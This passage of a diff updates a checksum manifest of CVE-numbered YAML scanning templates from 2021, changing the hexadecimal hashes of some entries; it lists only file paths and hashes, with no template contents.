http/cves/2021/CVE-2021-25008.yaml:e2bd2d41b569468489e3745dd421c1a15577402e -http/cves/2021/CVE-2021-25016.yaml:27da4e6df7ca94efe2b8b2cd4ddaa06bf44c8938 +http/cves/2021/CVE-2021-25016.yaml:7e5db140a5e15d6c4f566e9fa79633d79f43c95f http/cves/2021/CVE-2021-25028.yaml:533752557ff220a1bd422d2fb856f1ffb91b9969 http/cves/2021/CVE-2021-25033.yaml:8768311c117a0653e7cc5c8a4cc75d0769cee3c8 http/cves/2021/CVE-2021-25052.yaml:8dd5740bf3f98413a43c07b460940805e897ad52 -http/cves/2021/CVE-2021-25055.yaml:f7703e52995b4903f92459e9ef95df26f9bed1a2 +http/cves/2021/CVE-2021-25055.yaml:b2693690809e35e621974fbdd3f9cdcee3e81586 http/cves/2021/CVE-2021-25063.yaml:e0bfef38d39cfee9f885137ec3d3cb0a7565d712 -http/cves/2021/CVE-2021-25065.yaml:8ee7924a64132a0832e11a12581aae746b5da1c6 +http/cves/2021/CVE-2021-25065.yaml:cf7519269a965b59df933825b1d8a1eadf515bb1 http/cves/2021/CVE-2021-25067.yaml:51479ec179abace5e91c9513c221d45abb98ed25 -http/cves/2021/CVE-2021-25074.yaml:5a380fe97e9ed2a623bb5d9a76a78a9b9581a041 +http/cves/2021/CVE-2021-25074.yaml:0c2ee3fab033f99015e9963c3a329debca9b934b http/cves/2021/CVE-2021-25075.yaml:e47f941254f36267b1c9187f43bee0596e1d31a0 http/cves/2021/CVE-2021-25078.yaml:d7e219fd39f415ccd30398b2bb8cea67897fa1f3 http/cves/2021/CVE-2021-25079.yaml:18d97db163ecd42a7224f6e1e1a6a4ac9aeac16f @@ -2117,56 +2117,56 @@ http/cves/2021/CVE-2021-25099.yaml:9c14323218b138b43e2196b0d9665aaef686f140 http/cves/2021/CVE-2021-25104.yaml:78f06eb1f70bad226faeeb2acd5b31bb5ee06fa3 http/cves/2021/CVE-2021-25111.yaml:ba58695551c73cbccfd585cb8bb325f9558843b6 http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 -http/cves/2021/CVE-2021-25114.yaml:de2fc9698799328224086ad54e11e3bf5188bbd8 +http/cves/2021/CVE-2021-25114.yaml:7049b12767bd0f607abe013c91a9cc0c7bd9e996 http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 http/cves/2021/CVE-2021-25120.yaml:17afacb43d764c45b4c11ef9151650d2cad6cfe2 http/cves/2021/CVE-2021-25281.yaml:79d1459249cba40c4206e09d5ef25896ec77d5e5 -http/cves/2021/CVE-2021-25296.yaml:1ea2da93367acd6bef79a47edee35099bb087c1b -http/cves/2021/CVE-2021-25297.yaml:33a348dfb79f066846084ead1356f6f11e048cd4 -http/cves/2021/CVE-2021-25298.yaml:3f131671eb4b758e70cc80c0ca71539fee296f0b -http/cves/2021/CVE-2021-25299.yaml:272a24bd9027674933e7ab964c9d120c8927417b +http/cves/2021/CVE-2021-25296.yaml:1178f6b1950424cebdc097a1c83cfd1e8c951a84 +http/cves/2021/CVE-2021-25297.yaml:9738fb22f47e59bacf12acda843d5db83a5e5e5e +http/cves/2021/CVE-2021-25298.yaml:2e124dfc590672ee3d17a3571c5f73115e91a642 +http/cves/2021/CVE-2021-25299.yaml:acc2fc12b9e87c52a3a270b141f1e617bdeb7aba http/cves/2021/CVE-2021-25646.yaml:38bddfd4767c88b7a9adef79e7dd77f2b6b497ff -http/cves/2021/CVE-2021-25864.yaml:9daaf664447e04b31a2b08aea568666ed5b252c1 -http/cves/2021/CVE-2021-25899.yaml:847672538dfa776dd187401f816389805b41b0f4 -http/cves/2021/CVE-2021-26084.yaml:dc74db623993b3a425c67b349398428b21f4e59d -http/cves/2021/CVE-2021-26085.yaml:12540e7492ab6145ffdda97b28253d0a3a1f3953 -http/cves/2021/CVE-2021-26086.yaml:b35438578547ec4be571d2dbe1f853170d01713f -http/cves/2021/CVE-2021-26247.yaml:380aba2d0b92a8def54f9928094a3ca0882d4e43 -http/cves/2021/CVE-2021-26292.yaml:29180065c333be64a12dc3343a26bf290917d6c0 -http/cves/2021/CVE-2021-26294.yaml:31dc342ac953702eae9e11db5a4b67ccb1167d1c -http/cves/2021/CVE-2021-26295.yaml:617901b1d282ad4b7baf4cf033bfc80b78bcc89f +http/cves/2021/CVE-2021-25864.yaml:b98295af9c4ce976d3357ba5af76506dd9673a67 +http/cves/2021/CVE-2021-25899.yaml:09f6d90d362c88a063ff646cc2f97f95c632521c +http/cves/2021/CVE-2021-26084.yaml:71162e0c302190ddf12bd46130048c23d759b35b +http/cves/2021/CVE-2021-26085.yaml:fb17fe8c8c7c599cde52b8d377ab3bca36339f1e +http/cves/2021/CVE-2021-26086.yaml:e70ee11152a8acbf16d9d2264ad3695d1aa38c55 +http/cves/2021/CVE-2021-26247.yaml:d85b58689b6161c64bc5c01f03a32afb8117e22e +http/cves/2021/CVE-2021-26292.yaml:c7a60179f7c1e85b22df9a7987a51d740e85d7c6 +http/cves/2021/CVE-2021-26294.yaml:9426124355dfc278225fd06015965b1d0bcc0290 +http/cves/2021/CVE-2021-26295.yaml:ac77e9eaa39f90db27a6a90a58479ec1ec9f4b7f http/cves/2021/CVE-2021-26475.yaml:287c333e6e6c35e539e84260d37699f19044b24b -http/cves/2021/CVE-2021-26598.yaml:c8a1911cf29d1503f0f2c7ed84b03eb5554e4cd5 +http/cves/2021/CVE-2021-26598.yaml:de58b26112ae5c021a4e844ba78da4a0fbb06de3 http/cves/2021/CVE-2021-26702.yaml:eb202f4e53a83dd20ad98f8cbd4158d66c60fed5 http/cves/2021/CVE-2021-26710.yaml:ef7eb66ac883942d63f1343399937aa1dca8f788 http/cves/2021/CVE-2021-26723.yaml:00ec7edcbdeaccdac3537404c8d6c7c3f5c01ca4 http/cves/2021/CVE-2021-26812.yaml:3250f33a0d0ac1fc31b614df064b199abfb9aa84 -http/cves/2021/CVE-2021-26855.yaml:c42466d47d13e63fe225cbfe03e4ea5643fee6d9 +http/cves/2021/CVE-2021-26855.yaml:e0b1a005f2ce9861001a1a09be6f4bec31ee62af http/cves/2021/CVE-2021-27124.yaml:c5733fec98010b27de00dee5c3b7a7dbc1c5ae3d http/cves/2021/CVE-2021-27132.yaml:fcfd3632c51f9fc6add57cb17f22c786e429bc9f http/cves/2021/CVE-2021-27309.yaml:c0a0e164a992636c4d75f5c5a48093382a4a0861 -http/cves/2021/CVE-2021-27310.yaml:6c130175ed546ffc7a70969fe956b16deee4f64d +http/cves/2021/CVE-2021-27310.yaml:b4899b2a06e280c5fdd34795040962d3126f27df http/cves/2021/CVE-2021-27314.yaml:5a5d404050557c21d88703fe905484af36df4d1c http/cves/2021/CVE-2021-27315.yaml:a35e2b21d64664b1dc1b051b9aebe2c0d8bbea9a http/cves/2021/CVE-2021-27316.yaml:75fe1ce09716aeebd01d4e93523b46c13ac35002 http/cves/2021/CVE-2021-27319.yaml:b785025398590a56aed4ddf2ded77eb580bf4c39 http/cves/2021/CVE-2021-27320.yaml:4316c2de8def2bfa92ed880cfcee4a994e548b67 -http/cves/2021/CVE-2021-27330.yaml:b3d6336e6b5b9df123cebe0ea046817c7e2b25cc -http/cves/2021/CVE-2021-27358.yaml:94fdaf01a21c8691d6b0cada2300997502f97da4 -http/cves/2021/CVE-2021-27519.yaml:9987f825d5eef281ad03167be9471e2ff5bd9d33 -http/cves/2021/CVE-2021-27520.yaml:71740db07b842e556ff0e3502301f823a213012d +http/cves/2021/CVE-2021-27330.yaml:340cef397d60dd127fa5472b2337b351b6b1b618 +http/cves/2021/CVE-2021-27358.yaml:6cc74d204fce5604ff87cb9ca03b6dbb0bee4ce8 +http/cves/2021/CVE-2021-27519.yaml:d426f350b23221b3e952714f367dceea25bee73e +http/cves/2021/CVE-2021-27520.yaml:5783ca7bcadd97b20a2e43b8951033cc7f375d0c http/cves/2021/CVE-2021-27561.yaml:4466d02ccd5225c530894a23f7271a4e52927715 http/cves/2021/CVE-2021-27651.yaml:d4495c5c75916c88ebcfc6963aedcc1ac85c0c68 -http/cves/2021/CVE-2021-27670.yaml:b6418fe5edaaaecb5a4ec9a22c7eed0ccd501832 +http/cves/2021/CVE-2021-27670.yaml:e733bd5dbf959f04064931b6c390a390a4ec4f5b http/cves/2021/CVE-2021-27748.yaml:1dc51db3b3d3be24e2be6387448b7a662531edb5 http/cves/2021/CVE-2021-27850.yaml:64ecfed4708d7c2dc35acd4db916dbc2eb32ad74 -http/cves/2021/CVE-2021-27905.yaml:e55b787c321dac5c1fe1733431f805aa1b9a0c45 -http/cves/2021/CVE-2021-27909.yaml:b06dd842f67a5a6312ab0cf479ab4839b1005187 +http/cves/2021/CVE-2021-27905.yaml:bc0696a90dd8beb4b801e9a55edf8f1ca3b0723c +http/cves/2021/CVE-2021-27909.yaml:dd562c3aa5434371e145600408ab26a5c23b4ca3 http/cves/2021/CVE-2021-27931.yaml:52bce3b2966d95aaf19fbfc72760e749b05c862c http/cves/2021/CVE-2021-28073.yaml:b69885510093cff31b667b35c1004583ec9fbbf2 http/cves/2021/CVE-2021-28149.yaml:0a69b168f8c598056a57c29b2c4225737cb83bf0 http/cves/2021/CVE-2021-28150.yaml:a0787ef21b7d8d7d5f984f378d7bd37f54bdaeaa -http/cves/2021/CVE-2021-28151.yaml:e126ac73a0c4ae22fe04e5a1374c2fc480bc1367 +http/cves/2021/CVE-2021-28151.yaml:61efb4bdfbc96e3d49f200feb4b57d3a017e6b62 http/cves/2021/CVE-2021-28164.yaml:5dd4e3ae65a8c4ccc087ee45dc6c1039457fe244 http/cves/2021/CVE-2021-28169.yaml:37da3586f6f8475da6f63596d5cbf578af370502 http/cves/2021/CVE-2021-28377.yaml:0c0306f01abbec5444d522510bc897cea44339c7 @@ -2174,60 +2174,60 @@ http/cves/2021/CVE-2021-28419.yaml:06dd2715d496bb243207a231a5c63d7b1de18d6f http/cves/2021/CVE-2021-28854.yaml:dd2007f9a927a86fa6765c9534a1259eb3c46f86 http/cves/2021/CVE-2021-28918.yaml:20422a3d75001b729c00e4a3c90e9ed033fb4349 http/cves/2021/CVE-2021-28937.yaml:bd90f9666ffbbd6f1911cf7d3e92bcd7b10db395 -http/cves/2021/CVE-2021-29006.yaml:46596666b900962b362a68a1ae4665002fc8489f -http/cves/2021/CVE-2021-29156.yaml:dd426a2d85c02bdd6820151a503b813b623ffc6e -http/cves/2021/CVE-2021-29200.yaml:2eacb123c53c6291e6f98e85ade682001d2127aa +http/cves/2021/CVE-2021-29006.yaml:080f5ac49a6458ac4677d08bcb100305c1690f6f +http/cves/2021/CVE-2021-29156.yaml:1c5b14b8dbf5b3392cd9f4d9f904d3291baeee35 +http/cves/2021/CVE-2021-29200.yaml:e0d5b8886c05aac84d76fb90b5e3f347fd173148 http/cves/2021/CVE-2021-29203.yaml:097c5d57566606d4908f10ef8f557c2dbadc1684 http/cves/2021/CVE-2021-29441.yaml:437a19e0d1b5d31dea8ff40a951b703eb77e4136 http/cves/2021/CVE-2021-29442.yaml:818804dfe3d7008e6c615567ed874e1f3b45d2d9 -http/cves/2021/CVE-2021-29484.yaml:7be70cf51ae6211451faffc18a9dcca574c5a24b +http/cves/2021/CVE-2021-29484.yaml:6b2a1e0cfb266417ac5045a3da7e3bb5667210c9 http/cves/2021/CVE-2021-29490.yaml:da69b66fb55d67c32fb427d0c225e726f3ca7fbe http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:fac9f650cecf2b0249ff5db89704d89ac1ad2de3 -http/cves/2021/CVE-2021-29625.yaml:65852bbaa7ef79ac96435c4b5a55762e6df9558a +http/cves/2021/CVE-2021-29625.yaml:a7501143f8a0b262f13d0b5434dcf63044a488f7 http/cves/2021/CVE-2021-3002.yaml:689d379864c76a630eb3ad129fb379c2021a926e http/cves/2021/CVE-2021-30049.yaml:fc44294f44537b7426855643a448c2a138a2bb5c -http/cves/2021/CVE-2021-30128.yaml:b119c7a5cd0558a5d6ed6379e72d9a6dbd66ec8a +http/cves/2021/CVE-2021-30128.yaml:134d93f79c77cd70cbc599670eb8ff53f0abfc0a http/cves/2021/CVE-2021-30134.yaml:dfca391ce0dc56cbf534854f4bbac3b95a451754 -http/cves/2021/CVE-2021-30151.yaml:648be73d0bdb77e56474e68dfed691f58b291e36 +http/cves/2021/CVE-2021-30151.yaml:0a9ce95ee01caf99bf9017de1b21df52107bbc42 http/cves/2021/CVE-2021-3017.yaml:804614220a942d8b22c7cfa4f2ec1d43b3b8b8d7 http/cves/2021/CVE-2021-30175.yaml:42ecbdc2f4dcbdc81e94bcfd6d31af0c0f011c78 http/cves/2021/CVE-2021-3019.yaml:f07c8e5cc5ec9b7ae1b7cb57a35a7cb17281bacf http/cves/2021/CVE-2021-30213.yaml:d78b5aba3bec5186aac1eadbcab658a2ab1d4fdb -http/cves/2021/CVE-2021-30461.yaml:91ea30f242dac2f693091298b160762933c080b3 +http/cves/2021/CVE-2021-30461.yaml:f850fbb1ba00af98e42f6d64761ad04e73f7deaf http/cves/2021/CVE-2021-30497.yaml:475c233386c5ba0e18abcfdc0e304105c6a8a2e7 http/cves/2021/CVE-2021-3110.yaml:70a3a1b4da525f3cc12c8e320828c1de7787d711 -http/cves/2021/CVE-2021-31195.yaml:4bd37744f62b3d1bd7b9a9fcab8c18d2f1f6e4ea +http/cves/2021/CVE-2021-31195.yaml:6071225b1f00b45e0e524243dcd2e418bdc44638 http/cves/2021/CVE-2021-31249.yaml:514a2d8097e60e15ab5d5dea64714e8293db2b3a http/cves/2021/CVE-2021-31250.yaml:867864379eb75c9a81f7e05fb7b7919af58517e4 -http/cves/2021/CVE-2021-3129.yaml:58cf44f43956214483492f7c4f1664bd05036422 +http/cves/2021/CVE-2021-3129.yaml:c33b337720d1d13841d58cf3399a4f6fbeea5ea3 http/cves/2021/CVE-2021-31537.yaml:ef4891cdc66df98a86793a3189fb01e160c98d7e http/cves/2021/CVE-2021-31581.yaml:e5c18e16322cbd210f5fe06933959260e2cf08fa -http/cves/2021/CVE-2021-31589.yaml:b4cbfd0f2f1068028e2d5e0d49ef01cabf0f5d4d -http/cves/2021/CVE-2021-31602.yaml:1f94619245a151b2328fd592c9d96be8186812d9 -http/cves/2021/CVE-2021-31682.yaml:f3b62f2169e6269939a64015733c3648afe5fa90 +http/cves/2021/CVE-2021-31589.yaml:9fa9059c2f80f8acd452bf7735a34dc42c57285c +http/cves/2021/CVE-2021-31602.yaml:d6489a005a9b73c075baa06036d3da73de1480c6 +http/cves/2021/CVE-2021-31682.yaml:b27e14c816a3e0cd680e20283fc8ed2dd4af3fbf http/cves/2021/CVE-2021-31755.yaml:abd8d7371154a95f163a1536f988b90e708600c3 -http/cves/2021/CVE-2021-31805.yaml:3e4cd0ea3477154f2935b058433b16e67ea7da8b +http/cves/2021/CVE-2021-31805.yaml:18b42fc72af31b5c2a59f7984a0160592443cd9d http/cves/2021/CVE-2021-31856.yaml:02f2f826362c783a35fa70eee7772941eaddcde1 http/cves/2021/CVE-2021-31862.yaml:89473ea0b944e76fe6be8e9b83b2d2663ff6d8b3 http/cves/2021/CVE-2021-32030.yaml:c0a4636874282c087cf32c8e177c73dd9f771710 http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 -http/cves/2021/CVE-2021-3223.yaml:e1896f30e0499ef12ccb5fc03b892c9c87f2444b +http/cves/2021/CVE-2021-3223.yaml:dca718c60b362e6eb9af88a8eb8157f058a61ea7 http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 http/cves/2021/CVE-2021-32618.yaml:4874c4ff111966f4a1cad76dc222b1cbd967d88a -http/cves/2021/CVE-2021-32682.yaml:31e0b4b5fdcf1ff4fb51b0f653ecfbce0ec0d9d2 +http/cves/2021/CVE-2021-32682.yaml:a7238f98502dd9f9433bc3252c50fe30baaae419 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de -http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 +http/cves/2021/CVE-2021-32819.yaml:1774afef3c2ca020b98c215d7828010e292955f7 http/cves/2021/CVE-2021-32820.yaml:b75870f452e12388c569089adbaafea642e0aad9 http/cves/2021/CVE-2021-32853.yaml:8b24fa2ce857eaa46e5aaa1f51ff391f839370d0 -http/cves/2021/CVE-2021-3293.yaml:36aba5cc9aad3ae4e19921a3f84cdd1db53ae512 +http/cves/2021/CVE-2021-3293.yaml:4e2dedcc8e7116d054c3fcc34cb046a8b3a046a3 http/cves/2021/CVE-2021-3297.yaml:77ace535639edee109758e3bd19687248d82829a http/cves/2021/CVE-2021-33044.yaml:f267244e663d85f45c06e5e6fa8f572c8777c177 http/cves/2021/CVE-2021-33221.yaml:9c58ce321de4f629f5d1762a2e1832c46dcccca4 http/cves/2021/CVE-2021-33357.yaml:24596aa2d592229a59bacaa77d7ec280fdf036ef -http/cves/2021/CVE-2021-33544.yaml:fce70ffeea8d3bdb07f5f487869da319c7a95fa3 +http/cves/2021/CVE-2021-33544.yaml:d7e4d07f08c54ce45f6494309d5da6997f792fdb http/cves/2021/CVE-2021-33564.yaml:a82110635a2629a0c81dc6b2984959c690d0c393 -http/cves/2021/CVE-2021-33690.yaml:444266a7432bb0b56c6148250e0bd5e043c7d4c0 +http/cves/2021/CVE-2021-33690.yaml:0f3e9eeb77d3ff1363ddb0da9755eea741b3d310 http/cves/2021/CVE-2021-3374.yaml:d519f7466444215eb8fa36b51b72e8589eaad100 http/cves/2021/CVE-2021-3377.yaml:9bf0ad577fa9166abc78af4d61e6e441f41b2519 http/cves/2021/CVE-2021-3378.yaml:a842331f8c0924d398887c3ec42f8fbac970903c @@ -2236,152 +2236,152 @@ http/cves/2021/CVE-2021-33851.yaml:d37fb55018b8fb0d2a84a1be6c07984c49cf8c21 http/cves/2021/CVE-2021-33904.yaml:89ef9a57ce230eaba15109352d5a2754f31d0a0c http/cves/2021/CVE-2021-34370.yaml:a6bb7f8f166cf8c32e0d5413eb96c76d3fb3f6d1 http/cves/2021/CVE-2021-34429.yaml:8a584bf70eb9bdfd8daec086e96871d74f66e397 -http/cves/2021/CVE-2021-34473.yaml:73ac890892773d6afb2a31fea09c8c245a393b2d +http/cves/2021/CVE-2021-34473.yaml:fa24a4e5b3837a754935d6e3522f6adc12024350 http/cves/2021/CVE-2021-34621.yaml:56f9dc43ee199038f49466b0b480aa7a964ac31f http/cves/2021/CVE-2021-34640.yaml:c4684c43b933c18e653b46096cbda6fb725fced4 http/cves/2021/CVE-2021-34643.yaml:c4eafb5f2cac85929b4960a12274dafdc30fd58f http/cves/2021/CVE-2021-34805.yaml:aaa2167c9c4e34633b7c9d8ba32e96031ce341d1 -http/cves/2021/CVE-2021-35250.yaml:289efeaa556b5e04135b24cec42fefac1a7dd4da -http/cves/2021/CVE-2021-35265.yaml:b139ff21ddc649a5f3b9315e156c543cfeeed592 -http/cves/2021/CVE-2021-35323.yaml:d147477c5193b9fb927fdf34cf3903193413b232 +http/cves/2021/CVE-2021-35250.yaml:b8492695a2a90862ac905826f4290ab68b78227f +http/cves/2021/CVE-2021-35265.yaml:32e419643525a74d6aa0edacd139d81656a84dc1 +http/cves/2021/CVE-2021-35323.yaml:c021c3f08721a56c3b2a11eb350e50931d10959d http/cves/2021/CVE-2021-35336.yaml:a73c5bd76374c5db032ec1b03a3a833dbad07feb -http/cves/2021/CVE-2021-35380.yaml:166a86250742c082425c822f746a97c97e9db37c +http/cves/2021/CVE-2021-35380.yaml:a68669d1f2753320f002312d3adaf1d194ab654d http/cves/2021/CVE-2021-35395.yaml:d18dfdd20fc2124b6f6156bcc999c57407f34d33 -http/cves/2021/CVE-2021-35464.yaml:6efe7248948e30d881018d084229350824d1e3b5 -http/cves/2021/CVE-2021-35488.yaml:4dfcf3f693de2670eda1a5a3adc9f85a572eaee7 -http/cves/2021/CVE-2021-35587.yaml:79a2242ab3dc3488d90ba7787e73a2ed6827a81b +http/cves/2021/CVE-2021-35464.yaml:8be33ab011020e788015a19b946956828e6a0416 +http/cves/2021/CVE-2021-35488.yaml:e8e6daabb091537fb68769bc25393f2a59017fdb +http/cves/2021/CVE-2021-35587.yaml:06e8f297d113031339fbe3a65c7f5f8f69501ce1 http/cves/2021/CVE-2021-3577.yaml:f363338587c0c4eb79c5eb65cb54b01f0e62ccee http/cves/2021/CVE-2021-36260.yaml:64ff273b05ae0ed2d4a2f909ef25fef624192c72 http/cves/2021/CVE-2021-36356.yaml:ff2b6d790262793cd6ad07b08632309c64ac0ddd http/cves/2021/CVE-2021-36380.yaml:dc4250aaa3237110ffeb1b75dd8f00990ac7a4cd -http/cves/2021/CVE-2021-36450.yaml:969296d7e07a4431bb7eae6c5d6621144a217f9b +http/cves/2021/CVE-2021-36450.yaml:30add85f8e2fceb486735a59b38d4f844dc93a9d http/cves/2021/CVE-2021-3654.yaml:87e0613f4f6a62e23538b469f523b3e6357b1458 -http/cves/2021/CVE-2021-36580.yaml:967749bd57647c75bb0d380c9c31b82ed905b038 +http/cves/2021/CVE-2021-36580.yaml:694d82a3da4dfd6e628e95cc0073c88ae6ba803b http/cves/2021/CVE-2021-36748.yaml:113ef42346ebce2bd76538669dcdfeb52509d713 http/cves/2021/CVE-2021-36749.yaml:3b0a7b9a9d14edf603248b938e61d7db03f084a7 http/cves/2021/CVE-2021-36873.yaml:cbff75f79e65e669b04b3b174ef61d586109cc6b http/cves/2021/CVE-2021-37216.yaml:79f6fb2bedd55cef9c44cd8a90e800cbd1714802 -http/cves/2021/CVE-2021-37304.yaml:04fc8faf0d2365b7f1cbfcfc76f79c1c0c9e89cb -http/cves/2021/CVE-2021-37305.yaml:1e87bb921d860939bc5cacdc7a7c7993a9846a9f -http/cves/2021/CVE-2021-37416.yaml:d0889caca645e0a65b5791c8fe1975ffdddd8e9b -http/cves/2021/CVE-2021-37538.yaml:10b588b6c384ac1f6391bcca0f0cf5d2ecf3aca4 +http/cves/2021/CVE-2021-37304.yaml:02c50dc6a856643ea8de82ef2e7ad928c3f31ccf +http/cves/2021/CVE-2021-37305.yaml:c8f1386f0df602d42543b567a2fc05436c38c2cf +http/cves/2021/CVE-2021-37416.yaml:b9bd9211ae43ec9efc92f1b6bc8faeff8c4c483c +http/cves/2021/CVE-2021-37538.yaml:f48074a0bf7aa769a35e69f55c46296cfbefbdf6 http/cves/2021/CVE-2021-37573.yaml:bedcd4e63e8593038e1536ae1ff0ba4400d98c74 http/cves/2021/CVE-2021-37580.yaml:f5dc24043216b36560265de80278583728faf8b2 http/cves/2021/CVE-2021-37589.yaml:d69d7cccc5a283cba577bf63d83b2d1943385f75 http/cves/2021/CVE-2021-37704.yaml:6d7a10739f7c4d531b01d13b3cd734068f58fdfc -http/cves/2021/CVE-2021-37833.yaml:9147c87c1d8c7cbdc6c90e73f4537a2cfb0ffa08 +http/cves/2021/CVE-2021-37833.yaml:bbd01d34f36358af8e893c1014935481c6b974d7 http/cves/2021/CVE-2021-38314.yaml:e43ac750d1856a2d72b10c003a5f69fcb060db10 -http/cves/2021/CVE-2021-38540.yaml:40e60e5c143755bf34c45b134f71cca4a0165122 -http/cves/2021/CVE-2021-38647.yaml:d12fa581ce2c5917cb43d5af2d8edc56a31d3808 +http/cves/2021/CVE-2021-38540.yaml:0fd236e273150e5a74e09bceaa0f8eb1f1c4ea25 +http/cves/2021/CVE-2021-38647.yaml:33869f004b339925e1887ad27c14d1f97c88e4e2 http/cves/2021/CVE-2021-38702.yaml:7cb9a26484056f0955a7a91dd5ec2c6fa524df75 -http/cves/2021/CVE-2021-38704.yaml:bd8424cd3f0a688aac11da80e595d3545d3aee9f -http/cves/2021/CVE-2021-38751.yaml:f73039cf9ee89c0ed2f5823ea7932261ebffa038 +http/cves/2021/CVE-2021-38704.yaml:57b43442be5fee9b3e886124bd761bc48329f4ac +http/cves/2021/CVE-2021-38751.yaml:b2db52101696b760c965b1f7e0085a6f60e6163c http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 -http/cves/2021/CVE-2021-39146.yaml:9ef18404257cb1565c85ab67df499d1adaf5152c -http/cves/2021/CVE-2021-39152.yaml:27f978b5960d9eb90e9113b832f0ecdf0f1d54ad +http/cves/2021/CVE-2021-39146.yaml:7ab354f875634a920f91701449cb81fc8dd51cb4 +http/cves/2021/CVE-2021-39152.yaml:c080a8c46a7d1baed21cf75b1452308f96353412 http/cves/2021/CVE-2021-39165.yaml:41cb34053dcde697cdc2743a80c304656985e504 -http/cves/2021/CVE-2021-39211.yaml:ddf94e9cc0b050e3d6d330545946ad092c7ba314 -http/cves/2021/CVE-2021-39226.yaml:70ecb2383959f88ea9bfedaed49f76f5cf2a1475 +http/cves/2021/CVE-2021-39211.yaml:d39cfb4c5a20b929a7c5dec41679119ef73f85e9 +http/cves/2021/CVE-2021-39226.yaml:e487a56f909e9d1095786ef27f542a8a66cd205f http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e http/cves/2021/CVE-2021-39316.yaml:987c2e078d53725debd4637ce5c6d9f72914f683 http/cves/2021/CVE-2021-39320.yaml:002e6f6fcf6a88cd25bb3b423f9868e28ef80d59 http/cves/2021/CVE-2021-39322.yaml:6408a97278c6cf53fa277c226aa71b95f766fb41 -http/cves/2021/CVE-2021-39327.yaml:4b9e392a8aed5ba3712bfa79673e89e403616964 -http/cves/2021/CVE-2021-39350.yaml:bc1436fd7acd615ef4528971efa6a5066aa3b4d1 +http/cves/2021/CVE-2021-39327.yaml:940c1899b231b7310ed48ffc1692c265d75fdda7 +http/cves/2021/CVE-2021-39350.yaml:03f56a807e1a46070a1a58bbd6917a4ea804a4ce http/cves/2021/CVE-2021-39433.yaml:9ebfc436d00bdfee4b944d1764beb52757dd085e -http/cves/2021/CVE-2021-39501.yaml:8e87f45189acbbe1c3d8f72b7c8d3de6d6e4cf1e -http/cves/2021/CVE-2021-40149.yaml:cf24971583916fc9df26152d3a6904e5d2256b62 -http/cves/2021/CVE-2021-40150.yaml:8d42c33df3f2a2212cb566144682e68211366684 +http/cves/2021/CVE-2021-39501.yaml:3ef6a79e6783c528295d53ea6dd1e76fbbb7157d +http/cves/2021/CVE-2021-40149.yaml:2f040a01c1e9030be90ad0d77d80f01a1a291645 +http/cves/2021/CVE-2021-40150.yaml:a8b29c8b65bbb22ed53358e86d18e1c2d68a90a9 http/cves/2021/CVE-2021-40323.yaml:c887688f619ed428bfa00a8a3d1f560f50c4ee16 -http/cves/2021/CVE-2021-40438.yaml:c1b3337327ac449fa6493dfdb25cfced55cf4ac3 -http/cves/2021/CVE-2021-40539.yaml:51764f7c50c08d72e7f78823fe516f626c7eadb7 -http/cves/2021/CVE-2021-40542.yaml:3901563dc3bacc37311b557a68707c81831864d2 -http/cves/2021/CVE-2021-40651.yaml:caa1bf9adb2e2ad89e7a8c7920dd319e7752067c -http/cves/2021/CVE-2021-40661.yaml:f780fd916ac3f8d1c70ea104c4cbf11905176041 -http/cves/2021/CVE-2021-40822.yaml:deb901fe053f0c194f631c58770ce4386f819542 +http/cves/2021/CVE-2021-40438.yaml:5017fb9e1e48892198d0a204a547f26e393bf26a +http/cves/2021/CVE-2021-40539.yaml:ac0b4de3d6f4201b058ca3dbd6bb46eecfc33b80 +http/cves/2021/CVE-2021-40542.yaml:52f29d0ba20ee18d467144b89399d969bf973ac6 +http/cves/2021/CVE-2021-40651.yaml:cbe8219eec2c8cb455286b0808d3471a8bb6cb8a +http/cves/2021/CVE-2021-40661.yaml:54a6c0c08a555b2f8a877d96d82aaa7e9009c663 +http/cves/2021/CVE-2021-40822.yaml:bec122f20f1ef325a1f9f8b629c1fda6dec189e6 http/cves/2021/CVE-2021-40856.yaml:4aadf3d80dd73b612020a8d1ca20c5111201a957 http/cves/2021/CVE-2021-40859.yaml:a8a6ab85fce3e1aab3d083ea9f6e20657d55a958 http/cves/2021/CVE-2021-40868.yaml:c5c30fe3252bae32bf85e6b63c764d1c219d3cc7 http/cves/2021/CVE-2021-40870.yaml:46d3de8e6493f2e904332956193f0421aff425a3 -http/cves/2021/CVE-2021-40875.yaml:fb4c6615ea5e8751f122107366e3d08eec8d236b +http/cves/2021/CVE-2021-40875.yaml:764d8ffca73f1cc46af7a9bdb465754dcbaf8b3f http/cves/2021/CVE-2021-40908.yaml:78115ff3db4e03b21cb56370d0c01957d7539d8f http/cves/2021/CVE-2021-40960.yaml:0da341f855c1b922e90c84d04bd50f6b10c66eb9 -http/cves/2021/CVE-2021-40968.yaml:964f199af1bfb73b8aad3d1676fe863fdb72fa9f -http/cves/2021/CVE-2021-40969.yaml:5fa95bad2d845bd4e18097a5cbc2028480eb4f32 -http/cves/2021/CVE-2021-40970.yaml:7db56ae74c9d22d549d669e4621b3a5536ecdfc1 -http/cves/2021/CVE-2021-40971.yaml:d7c0f8712fe5a4d176bb466698ae0d0598458c3e -http/cves/2021/CVE-2021-40972.yaml:427e1fbcf2f2ab843437094217a83a741e972dd0 -http/cves/2021/CVE-2021-40973.yaml:d78c81f374b77cb9e1c791bddd878807aa4045a9 +http/cves/2021/CVE-2021-40968.yaml:fab0a7a100a159208930eec149ac0b39a21ee9df +http/cves/2021/CVE-2021-40969.yaml:00cc312618b127ed6224974925cf7e8d0c778a99 +http/cves/2021/CVE-2021-40970.yaml:812a802bdb3dfed9200701231e66f2f16ca64254 +http/cves/2021/CVE-2021-40971.yaml:7833b1168af2c32e2a4cf2c4bdcf942f309a521b 